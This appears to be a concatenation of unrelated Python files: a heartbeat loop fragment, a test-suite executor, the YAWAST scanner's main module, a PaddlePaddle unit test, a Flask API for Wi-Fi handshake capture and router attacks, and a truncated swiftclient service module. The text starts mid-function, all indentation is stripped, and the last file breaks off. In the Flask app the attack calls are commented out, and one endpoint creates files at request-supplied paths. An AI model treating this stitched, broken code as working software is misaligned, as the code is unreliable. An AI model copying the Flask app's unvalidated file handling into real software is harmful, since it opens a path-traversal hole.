while True:
if time.time() >= self.next_run:
await self.beat()
else:
await asyncio.sleep(1)
asyncio.run_coroutine_threadsafe(heart_beat(self), loop)
thread = threading.Thread(target=wrapper, args=[self, asyncio.get_event_loop()])
thread.daemon = True
thread.start()
self.running = True
async def beat(self) -> None:
if self.rust_api.remote.ws is not None:
await self.rust_api._send_wakeup_request()
def reset_rythm(self) -> None:
self.next_run = time.time() + 300
|
executor.py
|
"""Driver of the test execution framework."""
from __future__ import absolute_import
import threading
import time
from . import fixtures
from . import hook_test_archival as archival
from . import hooks as _hooks
from . import job as _job
from . import report as _report
from . import testcases
from .. import config as _config
from .. import errors
from .. import utils
from ..core import network
from ..utils import queue as _queue
class TestSuiteExecutor(object): # pylint: disable=too-many-instance-attributes
"""Execute a test suite.
Responsible for setting up and tearing down the fixtures that the
tests execute against.
"""
_TIMEOUT = 24 * 60 * 60 # =1 day (a long time to have tests run)
def __init__( # pylint: disable=too-many-arguments
self, exec_logger, suite, config=None, fixture=None, hooks=None, archive_instance=None,
archive=None):
"""Initialize the TestSuiteExecutor with the test suite to run."""
self.logger = exec_logger
if _config.SHELL_CONN_STRING is not None:
# Specifying the shellConnString command line option should override the fixture
# specified in the YAML configuration to be the external fixture.
self.fixture_config = {
"class": fixtures.EXTERNAL_FIXTURE_CLASS,
"shell_conn_string": _config.SHELL_CONN_STRING
}
else:
self.fixture_config = fixture
self.hooks_config = utils.default_if_none(hooks, [])
self.test_config = utils.default_if_none(config, {})
self.archival = None
if archive_instance:
self.archival = archival.HookTestArchival(suite, self.hooks_config, archive_instance,
archive)
self._suite = suite
self.test_queue_logger = self.logger.new_testqueue_logger(suite.test_kind)
# Only start as many jobs as we need. Note this means that the number of jobs we run may
# not actually be _config.JOBS or self._suite.options.num_jobs.
jobs_to_start = self._suite.options.num_jobs
self.num_tests = len(suite.tests) * self._suite.options.num_repeat_tests
if self.num_tests < jobs_to_start:
self.logger.info(
"Reducing the number of jobs from %d to %d since there are only %d test(s) to run.",
self._suite.options.num_jobs, self.num_tests, self.num_tests)
jobs_to_start = self.num_tests
# Must be done after getting buildlogger configuration.
self._jobs = [self._make_job(job_num) for job_num in xrange(jobs_to_start)]
def run(self):
"""Execute the test suite.
Any exceptions that occur during setting up or tearing down a
fixture are propagated.
"""
self.logger.info("Starting execution of %ss...", self._suite.test_kind)
return_code = 0
# The first run of the job will set up the fixture.
setup_flag = threading.Event()
# We reset the internal state of the PortAllocator so that ports used by the fixture during
# a test suite run earlier can be reused during this current test suite.
network.PortAllocator.reset()
teardown_flag = None
try:
num_repeat_suites = self._suite.options.num_repeat_suites
while num_repeat_suites > 0:
test_queue = self._make_test_queue()
partial_reports = [job.report for job in self._jobs]
self._suite.record_test_start(partial_reports)
# Have the Job threads destroy their fixture during the final repetition after they
# finish running their last test. This avoids having a large number of processes
# still running if an Evergreen task were to time out from a hang/deadlock being
# triggered.
teardown_flag = threading.Event() if num_repeat_suites == 1 else None
(report, interrupted) = self._run_tests(test_queue, setup_flag, teardown_flag)
self._suite.record_test_end(report)
if setup_flag and setup_flag.is_set():
self.logger.error("Setup of one of the job fixtures failed")
return_code = 2
return
# Remove the setup flag once the first suite ran.
setup_flag = None
# If the user triggered a KeyboardInterrupt, then we should stop.
if interrupted:
raise errors.UserInterrupt("Received interrupt from user")
if teardown_flag and teardown_flag.is_set():
return_code = 2
sb = [] # String builder.
self._suite.summarize_latest(sb)
self.logger.info("Summary: %s", "\n ".join(sb))
if not report.wasSuccessful():
return_code = 1
if self._suite.options.fail_fast:
break
test_report = report.as_dict()
test_results_num = len(test_report["results"])
# There should be at least as many tests results as expected number of tests.
if test_results_num < self.num_tests:
raise errors.ResmokeError("{} reported tests is less than {} expected tests"
.format(test_results_num, self.num_tests))
# Clear the report so it can be reused for the next execution.
for job in self._jobs:
job.report.reset()
num_repeat_suites -= 1
finally:
if not teardown_flag:
if not self._teardown_fixtures():
return_code = 2
self._suite.return_code = return_code
def _run_tests(self, test_queue, setup_flag, teardown_flag):
"""Start a thread for each Job instance and block until all of the tests are run.
Returns a (combined report, user interrupted) pair, where the
report contains the status and timing information of tests run
by all of the threads.
"""
threads = []
interrupt_flag = threading.Event()
user_interrupted = False
try:
# Run each Job instance in its own thread.
for job in self._jobs:
thr = threading.Thread(target=job, args=(test_queue, interrupt_flag), kwargs=dict(
setup_flag=setup_flag, teardown_flag=teardown_flag))
# Do not wait for tests to finish executing if interrupted by the user.
thr.daemon = True
thr.start()
threads.append(thr)
# SERVER-24729 Need to stagger when jobs start to reduce I/O load if there
# are many of them. Both the 5 and the 10 are arbitrary.
# Currently only enabled on Evergreen.
if _config.STAGGER_JOBS and len(threads) >= 5:
time.sleep(10)
joined = False
while not joined:
# Need to pass a timeout to join() so that KeyboardInterrupt exceptions
# are propagated.
joined = test_queue.join(TestSuiteExecutor._TIMEOUT)
except (KeyboardInterrupt, SystemExit):
interrupt_flag.set()
user_interrupted = True
else:
# Only wait for all the Job instances if not interrupted by the user.
for thr in threads:
thr.join()
reports = [job.report for job in self._jobs]
combined_report = _report.TestReport.combine(*reports)
# We cannot return 'interrupt_flag.is_set()' because the interrupt flag can be set by a Job
# instance if a test fails and it decides to drain the queue. We only want to raise a
# StopExecution exception in TestSuiteExecutor.run() if the user triggered the interrupt.
return (combined_report, user_interrupted)
def _teardown_fixtures(self):
"""Tear down all of the fixtures.
Returns true if all fixtures were torn down successfully, and
false otherwise.
"""
success = True
for job in self._jobs:
if not job.teardown_fixture():
self.logger.warning("Teardown of %s of job %s was not successful", job.fixture,
job.job_num)
success = False
return success
def _make_fixture(self, job_num, job_logger):
"""Create a fixture for a job."""
fixture_config = {}
fixture_class = fixtures.NOOP_FIXTURE_CLASS
if self.fixture_config is not None:
fixture_config = self.fixture_config.copy()
fixture_class = fixture_config.pop("class")
fixture_logger = job_logger.new_fixture_logger(fixture_class)
return fixtures.make_fixture(fixture_class, fixture_logger, job_num, **fixture_config)
def _make_hooks(self, fixture):
"""Create the hooks for the job's fixture."""
hooks = []
for hook_config in self.hooks_config:
hook_config = hook_config.copy()
hook_class = hook_config.pop("class")
hook_logger = self.logger.new_hook_logger(hook_class, fixture.logger)
hook = _hooks.make_hook(hook_class, hook_logger, fixture, **hook_config)
hooks.append(hook)
return hooks
def _make_job(self, job_num):
"""Return a Job instance with its own fixture, hooks, and test report."""
job_logger = self.logger.new_job_logger(self._suite.test_kind, job_num)
fixture = self._make_fixture(job_num, job_logger)
hooks = self._make_hooks(fixture)
report = _report.TestReport(job_logger, self._suite.options)
return _job.Job(job_num, job_logger, fixture, hooks, report, self.archival,
self._suite.options, self.test_queue_logger)
def _make_test_queue(self):
"""Return a queue of TestCase instances.
Use a multi-consumer queue instead of a unittest.TestSuite so
that the test cases can be dispatched to multiple threads.
"""
# Put all the test cases in a queue.
queue = _queue.Queue()
for _ in range(self._suite.options.num_repeat_tests):
for test_name in self._suite.tests:
test_case = testcases.make_test_case(self._suite.test_kind, self.test_queue_logger,
test_name, **self.test_config)
queue.put(test_case)
# Add sentinel value for each job to indicate when there are no more items to process.
for _ in xrange(len(self._jobs)):
queue.put(None)
return queue
|
main.py
|
import locale
import platform
import signal
import ssl
import sys
import threading
import time
from datetime import datetime
from multiprocessing import current_process, active_children
from typing import cast
import psutil
from colorama import Fore
from packaging import version
from psutil import Process
from yawast import command_line
from yawast._version import get_version
from yawast.external.get_char import getchar
from yawast.external.memory_size import Size
from yawast.external.spinner import Spinner
from yawast.reporting import reporter
from yawast.shared import output, network
_start_time = datetime.now()
_monitor = None
_has_shutdown = False
def main():
global _start_time, _monitor
signal.signal(signal.SIGINT, signal_handler)
parser = command_line.build_parser()
args, urls = parser.parse_known_args()
# setup the output system
output.setup(args.debug, args.nocolors)
output.debug("Starting application...")
network.init(args.proxy, args.cookie)
# if we made it this far, it means that the parsing worked.
urls = command_line.process_urls(urls)
# we are good to keep going
print_header()
if args.output is not None:
reporter.init(args.output)
_set_basic_info()
print(f"Saving output to '{reporter.get_output_file()}'")
print()
try:
with _KeyMonitor():
with _ProcessMonitor() as pm:
_monitor = pm
args.func(args, urls)
except KeyboardInterrupt:
output.empty()
output.error("Scan cancelled by user.")
finally:
_shutdown()
def print_header():
start_time = time.strftime("%Y-%m-%d %H:%M:%S %Z (%z)", time.localtime())
vm = psutil.virtual_memory()
mem_total = "{0:cM}".format(Size(vm.total))
mem_avail = "{0:cM}".format(Size(vm.available))
cpu_freq = psutil.cpu_freq()
cpu_max = int(cpu_freq.max)
if cpu_max == 0:
# in this case, we don't have a real max, so go with current
cpu_max = int(cpu_freq.current)
print(r" .-. .- ")
print(r" \ \ / / _ ")
print(r" \ \ / / | | ")
print(r" \ \ / / __ ___ ____ _ ___| |_ ")
print(r" \ \ / / / _` \ \ /\ / / _` / __| __|")
print(r" \ ` / | (_| |\ V V / (_| \__ \ |_ ")
print(r" \ / \__,_| \_/\_/ \__,_|___/\__|")
print(r" / / ")
print(r" |`-' / ...where a pentest starts ")
print(r" '..' ")
print()
print(f"The YAWAST Antecedent Web Application Security Toolkit (v{get_version()})")
print(" Copyright (c) 2013-2019 Adam Caudill <adam@adamcaudill.com>")
print(" Support & Documentation: https://github.com/adamcaudill/yawast")
print(
f" Python {''.join(sys.version.splitlines())} ({platform.python_implementation()})"
)
print(f" {ssl.OPENSSL_VERSION}")
print(f" Platform: {platform.platform()} ({_get_locale()})")
print(
f" CPU(s): {psutil.cpu_count()}@{cpu_max}MHz - RAM: {mem_total} ({mem_avail} Available)"
)
output.print_color(Fore.CYAN, " " + _get_version_info())
print()
print(f" Started at {start_time}")
print("")
print("Connection Status:")
print(f" {network.check_ipv4_connection()}")
print(f" {network.check_ipv6_connection()}")
print()
def signal_handler(sig, frame):
if sig == signal.SIGINT:
# check to see if we are a worker, or the main process
if current_process().name == "MainProcess":
output.empty()
output.norm("Scan cancelled by user.")
_shutdown()
try:
active_children()
except:
# we don't care if this fails
pass
sys.exit(1)
def _shutdown():
global _start_time, _monitor, _has_shutdown
if _has_shutdown:
return
_has_shutdown = True
output.debug("Shutting down...")
elapsed = datetime.now() - _start_time
mem_res = "{0:cM}".format(Size(_monitor.peak_mem_res))
output.empty()
output.norm(f"Completed (Elapsed: {str(elapsed)} - Peak Memory: {mem_res})")
if reporter.get_output_file() != "":
with Spinner():
reporter.save_output()
def _get_locale() -> str:
# get the locale
try:
locale.setlocale(locale.LC_ALL, "")
lcl = locale.getdefaultlocale()
except Exception as error:
print(
f"Unable to get Locale: {str(error)} - attempting to force locale to en_US.utf8"
)
try:
if platform.system() == "Darwin":
locale.setlocale(locale.LC_ALL, "EN_US")
else:
locale.setlocale(locale.LC_ALL, "en_US.utf8")
lcl = locale.getdefaultlocale()
except Exception as err:
print(f"Unable to set locale: {str(err)}")
return "(Unknown locale)"
if lcl is not None:
loc = f"{lcl[0]}.{lcl[1]}"
else:
loc = "(Unknown locale)"
return loc
def _set_basic_info():
reporter.register_info("start_time", int(time.time()))
reporter.register_info("yawast_version", get_version())
reporter.register_info(
"python_version",
f"{''.join(sys.version.splitlines())} ({platform.python_implementation()})",
)
reporter.register_info("openssl_version", ssl.OPENSSL_VERSION)
reporter.register_info("platform", platform.platform())
reporter.register_info("options", str(sys.argv))
reporter.register_info("encoding", _get_locale())
def _get_version_info() -> str:
try:
data, code = network.http_json("https://pypi.org/pypi/yawast/json")
except Exception:
output.debug_exception()
return "Supported Version: (Unable to get version information)"
if code != 200:
ret = "Supported Version: (PyPi returned an error code while fetching current version)"
else:
if "info" in data and "version" in data["info"]:
ver = cast(version.Version, version.parse(get_version()))
curr_version = cast(version.Version, version.parse(data["info"]["version"]))
ret = f"Supported Version: {curr_version} - "
if ver == curr_version:
ret += "You are on the latest version."
elif ver > curr_version or "dev" in get_version():
ret += "You are on a pre-release version. Take care."
else:
ret += "Please update to the current version."
else:
ret = "Supported Version: (PyPi returned invalid data while fetching current version)"
return ret
class _KeyMonitor:
busy = False
def wait_task(self):
if sys.stdout.isatty():
while self.busy:
try:
key = getchar()
if key != "":
output.debug(f"Received from keyboard: {key}")
if key == "d":
output.toggle_debug()
time.sleep(0.1)
except Exception:
output.debug_exception()
self.busy = False
pass
else:
# if this isn't a TTY, no point in doing any of this
self.busy = False
def __enter__(self):
self.busy = True
threading.Thread(target=self.wait_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
if exception is not None:
return False
class _ProcessMonitor:
WARNING_THRESHOLD = 100 * 1024 * 1024
busy = False
def __init__(self):
self.process = Process()
self.peak_mem_res = 0
self.low_mem_warning = False
def monitor_task(self):
if sys.stdout.isatty():
while self.busy:
try:
# only print the data out every 10 seconds
if datetime.now().second / 10 == 0:
info = self._get_info()
output.debug(info)
else:
# call get_mem so that we record peak more accurately
self._get_mem()
time.sleep(1)
except Exception:
output.debug_exception()
self.busy = False
pass
else:
# if this isn't a TTY, no point in doing any of this
self.busy = False
def _get_info(self) -> str:
from yawast.external.memory_size import Size
# prime the call to cpu_percent, as the first call doesn't return useful data
self.process.cpu_percent(interval=1)
# use oneshot() to cache the data, so we minimize hits
with self.process.oneshot():
pct = self.process.cpu_percent()
times = self.process.cpu_times()
mem = self._get_mem()
mem_res = "{0:cM}".format(Size(mem.rss))
mem_virt = "{0:cM}".format(Size(mem.vms))
thr = self.process.num_threads()
vm = psutil.virtual_memory()
mem_total = "{0:cM}".format(Size(vm.total))
mem_avail_bytes = vm.available
mem_avail = "{0:cM}".format(Size(vm.available))
if mem_avail_bytes < self.WARNING_THRESHOLD and not self.low_mem_warning:
self.low_mem_warning = True
output.error(f"Low RAM Available: {mem_avail}")
cons = -1
try:
cons = len(self.process.connections(kind="inet"))
except Exception:
# we don't care if this fails
output.debug_exception()
cpu_freq = psutil.cpu_freq()
info = (
f"Process Stats: CPU: {pct}% - Sys: {times.system} - "
f"User: {times.user} - Res: {mem_res} - Virt: {mem_virt} - "
f"Available: {mem_avail}/{mem_total} - Threads: {thr} - "
f"Connections: {cons} - CPU Freq: "
f"{int(cpu_freq.current)}MHz/{int(cpu_freq.max)}MHz"
)
return info
def _get_mem(self):
mem = self.process.memory_info()
if mem.rss > self.peak_mem_res:
self.peak_mem_res = mem.rss
output.debug(f"New high-memory threshold: {self.peak_mem_res}")
return mem
def __enter__(self):
self.busy = True
threading.Thread(target=self.monitor_task).start()
return self
def __exit__(self, exception, value, tb):
self.busy = False
if exception is not None:
return False
|
model_helper_test.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import unittest
from parl.core.model_helper import global_model_helper
from six.moves.queue import Queue
class GlobalModelHelperTest(unittest.TestCase):
def test_generate_model_id(self):
id1 = global_model_helper.generate_model_id()
id2 = global_model_helper.generate_model_id()
self.assertNotEqual(id1, id2)
def _gen_model_id(self, q):
model_id = global_model_helper.generate_model_id()
q.put(model_id)
def test_generate_model_id_with_multi_thread(self):
q = Queue()
t1 = threading.Thread(target=self._gen_model_id, args=(q, ))
t2 = threading.Thread(target=self._gen_model_id, args=(q, ))
t1.start()
t2.start()
t1.join()
t2.join()
id1 = q.get()
id2 = q.get()
self.assertNotEqual(id1, id2)
def test_register_model_id(self):
global_model_helper.register_model_id('my_model_0')
global_model_helper.register_model_id('my_model_1')
with self.assertRaises(AssertionError):
global_model_helper.register_model_id('my_model_0')
def _register_model_id(self, q):
try:
global_model_helper.register_model_id('my_model_2')
except AssertionError:
q.put(False)
else:
q.put(True)
def test_register_model_id_with_multi_thread(self):
q = Queue()
t1 = threading.Thread(target=self._register_model_id, args=(q, ))
t2 = threading.Thread(target=self._register_model_id, args=(q, ))
t1.start()
t2.start()
t1.join()
t2.join()
return1 = q.get()
return2 = q.get()
assert (return1 is True and return2 is False) or \
(return1 is False and return2 is True)
def test_registet_model_id_with_used_model_id(self):
model_id = global_model_helper.generate_model_id()
with self.assertRaises(AssertionError):
global_model_helper.register_model_id(model_id)
if __name__ == '__main__':
unittest.main()
|
locapp.py
|
# coding:utf-8
import threading
from flask import Flask, request, Response, send_from_directory, make_response, render_template
import json
import gevent.monkey
from gevent.pywsgi import WSGIServer
import redis
from flask.ext.cors import CORS
gevent.monkey.patch_all()
# 内部引用
from wifilist.mongoquery import getquerydate
from wifilist.getwifihandshake import HANDSHAKE
from wifilist.routeattack import ROUTE
app = Flask(__name__)
CORS(app)
@app.route('/')
def root():
return render_template('swmfile.html')
@app.route('/api/mongodata', methods=['get'])
def sendmongodata():
responsedata = getquerydate()
return Response(responsedata, mimetype="application/json")
@app.route('/api/startcollect', methods=['post'])
def starttheserver():
args = json.loads(request.data)
# 类型强转确保int
seconds = int(args['seconds'])
if int(args['start']) == 1:
# control = CONTROL(seconds)
# thread1 = threading.Thread(target=control.start)
# thread2 = threading.Thread(target=control.killshell)
# thread1.start()
# thread2.start()
# thread1.join()
# thread2.join()
info = {"complete": 1}
else:
info = {"complete": 0, "error": "something wrong with you!"}
response = Response(json.dumps(info), mimetype="application/json")
return response
@app.route('/api/handshake', methods=['post'])
def collecthandshake():
args = json.loads(request.data)
open(args['wifi'], "w+").close()
# handshake = HANDSHAKE(args['mac'], int(args['ch']), args['wifi'])
# router = ROUTE(args['mac'])
# t1 = threading.Thread(target=handshake.starthandshake)
# t2 = threading.Thread(target=router.start)
# t1.start()
# t2.start()
# t2.join()
# t1.join()
# from terminal.allconfig import conf
# r = redis.Redis(host=conf['redishost'], port=conf['redisport'])
# get = r.hget("handshake", "GET")
if args is not None:
info = {"complete": 1}
else:
info = {"complete": 0, "error": "Failed get wifi handshake"}
return Response(json.dumps(info), mimetype="application/json")
@app.route('/api/download/<wifi>', methods=['GET'])
def download(wifi):
filepath = './'
filename = '{}'.format(wifi)
# 中文
response = make_response(send_from_directory(directory=filepath, filename=filename, as_attachment=True))
# except:
# info = {"complete": 0, "error": "No such file, scan wifi failed"}
# return Response(json.dumps(info), mimetype="application/json")
response.headers["Content-Disposition"] = "attachment; filename={}".format(filename.encode().decode('latin-1'))
return response
if __name__ == '__main__':
http_server = WSGIServer(('0.0.0.0', 8014), app)
try:
print("Start at " + http_server.server_host +
':' + str(http_server.server_port))
http_server.serve_forever()
except(KeyboardInterrupt):
print('Exit...')
|
service.py
|
# Copyright (c) 2010-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import logging
import os
from concurrent.futures import as_completed, CancelledError, TimeoutError
from copy import deepcopy
from errno import EEXIST, ENOENT
from hashlib import md5
from os import environ, makedirs, stat, utime
from os.path import (
basename, dirname, getmtime, getsize, isdir, join, sep as os_path_sep
)
from posixpath import join as urljoin
from random import shuffle
from time import time
from threading import Thread
from six import Iterator, StringIO, string_types, text_type
from six.moves.queue import Queue
from six.moves.queue import Empty as QueueEmpty
from six.moves.urllib.parse import quote
import json
from swiftclient import Connection
from swiftclient.command_helpers import (
stat_account, stat_container, stat_object
)
from swiftclient.utils import (
config_true_value, ReadableToIterable, LengthWrapper, EMPTY_ETAG,
parse_api_response, report_traceback, n_groups, split_request_headers,
n_at_a_time
)
from swiftclient.exceptions import ClientException
from swiftclient.multithreading import MultiThreadingManager
DISK_BUFFER = 2 ** 16
logger = logging.getLogger("swiftclient.service")
class ResultsIterator(Iterator):
def __init__(self, futures):
self.futures = interruptable_as_completed(futures)
def __iter__(self):
return self
def __next__(self):
next_completed_future = next(self.futures)
return next_completed_future.result()
class SwiftError(Exception):
def __init__(self, value, container=None, obj=None,
segment=None, exc=None):
self.value = value
self.container = container
self.obj = obj
self.segment = segment
self.exception = exc
def __str__(self):
value = repr(self.value)
if self.container is not None:
value += " container:%s" % self.container
if self.obj is not None:
value += " object:%s" % self.obj
if self.segment is not None:
value += " segment:%s" % self.segment
return value
def process_options(options):
# tolerate sloppy auth_version
if options.get('auth_version') == '3.0':
options['auth_version'] = '3'
elif options.get('auth_version') == '2':
options['auth_version'] = '2.0'
if options.get('auth_version') not in ('2.0', '3') and not all(
options.get(key) for key in ('auth', 'user', 'key')):
# Use keystone auth if any of the new-style args are present
if any(options.get(k) for k in (
'os_user_domain_id',
'os_user_domain_name',
'os_project_domain_id',
'os_project_domain_name')):
# Use v3 if there's any reference to domains
options['auth_version'] = '3'
else:
options['auth_version'] = '2.0'
# Use new-style args if old ones not present
if not options['auth'] and options['os_auth_url']:
options['auth'] = options['os_auth_url']
if not options['user'] and options['os_username']:
options['user'] = options['os_username']
if not options['key'] and options['os_password']:
options['key'] = options['os_password']
# Specific OpenStack options
options['os_options'] = {
'user_id': options['os_user_id'],
'user_domain_id': options['os_user_domain_id'],
'user_domain_name': options['os_user_domain_name'],
'tenant_id': options['os_tenant_id'],
'tenant_name': options['os_tenant_name'],
'project_id': options['os_project_id'],
'project_name': options['os_project_name'],
'project_domain_id': options['os_project_domain_id'],
'project_domain_name': options['os_project_domain_name'],
'service_type': options['os_service_type'],
'endpoint_type': options['os_endpoint_type'],
'auth_token': options['os_auth_token'],
'object_storage_url': options['os_storage_url'],
'region_name': options['os_region_name'],
}
def _build_default_global_options():
return {
"snet": False,
"verbose": 1,
"debug": False,
"info": False,
"auth": environ.get('ST_AUTH'),
"auth_version": environ.get('ST_AUTH_VERSION', '1.0'),
"user": environ.get('ST_USER'),
"key": environ.get('ST_KEY'),
"retries": 5,
"os_username": environ.get('OS_USERNAME'),
"os_user_id": environ.get('OS_USER_ID'),
"os_user_domain_name": environ.get('OS_USER_DOMAIN_NAME'),
"os_user_domain_id": environ.get('OS_USER_DOMAIN_ID'),
"os_password": environ.get('OS_PASSWORD'),
"os_tenant_id": environ.get('OS_TENANT_ID'),
"os_tenant_name": environ.get('OS_TENANT_NAME'),
"os_project_name": environ.get('OS_PROJECT_NAME'),
"os_project_id": environ.get('OS_PROJECT_ID'),
"os_project_domain_name": environ.get('OS_PROJECT_DOMAIN_NAME'),
"os_project_domain_id": environ.get('OS_PROJECT_DOMAIN_ID'),
"os_auth_url": environ.get('OS_AUTH_URL'),
"os_auth_token": environ.get('OS_AUTH_TOKEN'),
"os_storage_url": environ.get('OS_STORAGE_URL'),
"os_region_name": environ.get('OS_REGION_NAME'),
"os_service_type": environ.get('OS_SERVICE_TYPE'),
"os_endpoint_type": environ.get('OS_ENDPOINT_TYPE'),
"os_cacert": environ.get('OS_CACERT'),
"os_cert": environ.get('OS_CERT'),
"os_key": environ.get('OS_KEY'),
"insecure": config_true_value(environ.get('SWIFTCLIENT_INSECURE')),
"ssl_compression": False,
'segment_threads': 10,
'object_dd_threads': 10,
'object_uu_threads': 10,
'container_threads': 10
}
_default_global_options = _build_default_global_options()
_default_local_options = {
'sync_to': None,
'sync_key': None,
'use_slo': False,
'segment_size': None,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'yes_all': False,
'read_acl': None,
'write_acl': None,
'out_file': None,
'out_directory': None,
'remove_prefix': False,
'no_download': False,
'long': False,
'totals': False,
'marker': '',
'header': [],
'meta': [],
'prefix': None,
'delimiter': None,
'fail_fast': False,
'human': False,
'dir_marker': False,
'checksum': True,
'shuffle': False,
'destination': None,
'fresh_metadata': False,
'ignore_mtime': False,
}
POLICY = 'X-Storage-Policy'
KNOWN_DIR_MARKERS = (
'application/directory', # Preferred
'text/directory', # Historically relevant
)
def get_from_queue(q, timeout=864000):
while True:
try:
item = q.get(timeout=timeout)
return item
except QueueEmpty:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_future_result(f, timeout=86400):
while True:
try:
res = f.result(timeout=timeout)
return res
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def interruptable_as_completed(fs, timeout=86400):
while True:
try:
for f in as_completed(fs, timeout=timeout):
fs.remove(f)
yield f
return
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_conn(options):
"""
Return a connection building it from the options.
"""
return Connection(options['auth'],
options['user'],
options['key'],
options['retries'],
auth_version=options['auth_version'],
os_options=options['os_options'],
snet=options['snet'],
cacert=options['os_cacert'],
insecure=options['insecure'],
cert=options['os_cert'],
cert_key=options['os_key'],
ssl_compression=options['ssl_compression'])
def mkdirs(path):
try:
makedirs(path)
except OSError as err:
if err.errno != EEXIST:
raise
def split_headers(options, prefix=''):
"""
Splits 'Key: Value' strings and returns them as a dictionary.
:param options: Must be one of:
* an iterable of 'Key: Value' strings
* an iterable of ('Key', 'Value') pairs
* a dict of {'Key': 'Value'} pairs
:param prefix: String to prepend to all of the keys in the dictionary.
reporting.
"""
headers = {}
try:
headers = split_request_headers(options, prefix)
except ValueError as e:
raise SwiftError(e)
return headers
class SwiftUploadObject(object):
"""
Class for specifying an object upload, allowing the object source, name and
options to be specified separately for each individual object.
"""
def __init__(self, source, object_name=None, options=None):
if isinstance(source, string_types):
self.object_name = object_name or source
elif source is None or hasattr(source, 'read'):
if not object_name or not isinstance(object_name, string_types):
raise SwiftError('Object names must be specified as '
'strings for uploads from None or file '
'like objects.')
self.object_name = object_name
else:
raise SwiftError('Unexpected source type for '
'SwiftUploadObject: {0}'.format(type(source)))
if not self.object_name:
raise SwiftError('Object names must not be empty strings')
self.object_name = self.object_name.lstrip('/')
self.options = options
self.source = source
class SwiftPostObject(object):
"""
Class for specifying an object post, allowing the headers/metadata to be
specified separately for each individual object.
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
class SwiftCopyObject(object):
"""
Class for specifying an object copy,
allowing the destination/headers/metadata/fresh_metadata to be specified
separately for each individual object.
destination and fresh_metadata should be set in options
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
if self.options is None:
self.destination = None
self.fresh_metadata = False
else:
self.destination = self.options.get('destination')
self.fresh_metadata = self.options.get('fresh_metadata', False)
if self.destination is not None:
destination_components = self.destination.split('/')
if destination_components[0] or len(destination_components) < 2:
raise SwiftError("destination must be in format /cont[/obj]")
if not destination_components[-1]:
raise SwiftError("destination must not end in a slash")
if len(destination_components) == 2:
# only container set in destination
self.destination = "{0}/{1}".format(
self.destination, object_name
)
class _SwiftReader(object):
"""
Class for downloading objects from swift and raising appropriate
errors on failures caused by either invalid md5sum or size of the
data read.
"""
def __init__(self, path, body, headers, checksum=True):
self._path = path
self._body = body
self._actual_read = 0
self._content_length = None
self._actual_md5 = None
self._expected_md5 = headers.get('etag', '')
if len(self._expected_md5) > 1 and self._expected_md5[0] == '"' \
and self._expected_md5[-1] == '"':
self._expected_md5 = self._expected_md5[1:-1]
# Some headers indicate the MD5 of the response
# definitely *won't* match the ETag
bad_md5_headers = set([
'content-range',
'x-object-manifest',
'x-static-large-object',
])
if bad_md5_headers.intersection(headers):
# This isn't a useful checksum
self._expected_md5 = ''
if self._expected_md5 and checksum:
self._actual_md5 = md5()
if 'content-length' in headers:
try:
self._content_length = int(headers.get('content-length'))
except ValueError:
raise SwiftError('content-length header must be an integer')
def __iter__(self):
for chunk in self._body:
if self._actual_md5:
self._actual_md5.update(chunk)
self._actual_read += len(chunk)
yield chunk
self._check_contents()
def _check_contents(self):
if self._actual_md5 and self._expected_md5:
etag = self._actual_md5.hexdigest()
if etag != self._expected_md5:
raise SwiftError('Error downloading {0}: md5sum != etag, '
'{1} != {2}'.format(
self._path, etag, self._expected_md5))
if (self._content_length is not None
and self._actual_read != self._content_length):
raise SwiftError('Error downloading {0}: read_length != '
'content_length, {1:d} != {2:d}'.format(
self._path, self._actual_read,
self._content_length))
def bytes_read(self):
return self._actual_read
class SwiftService(object):
"""
Service for performing swift operations
"""
def __init__(self, options=None):
if options is not None:
self._options = dict(
_default_global_options,
**dict(_default_local_options, **options)
)
else:
self._options = dict(
_default_global_options,
**_default_local_options
)
process_options(self._options)
create_connection = lambda: get_conn(self._options)
self.thread_manager = MultiThreadingManager(
create_connection,
segment_threads=self._options['segment_threads'],
object_dd_threads=self._options['object_dd_threads'],
object_uu_threads=self._options['object_uu_threads'],
container_threads=self._options['container_threads']
)
self.capabilities_cache = {} # Each instance should have its own cache
def __enter__(self):
self.thread_manager.__enter__()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.thread_manager.__exit__(exc_type, exc_val, exc_tb)
# Stat related methods
#
def stat(self, container=None, objects=None, options=None):
"""
Get account stats, container stats or information about a list of
objects in a container.
:param container: The container to query.
:param objects: A list of object paths about which to return
information (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all stat operations
performed by this call::
{
'human': False,
'header': []
}
:returns: Either a single dictionary containing stats about an account
or container, or an iterator for returning the results of the
stat operations on a list of objects.
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
if objects:
raise SwiftError('Objects specified without container')
else:
res = {
'action': 'stat_account',
'success': True,
'container': container,
'object': None,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_account, options
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
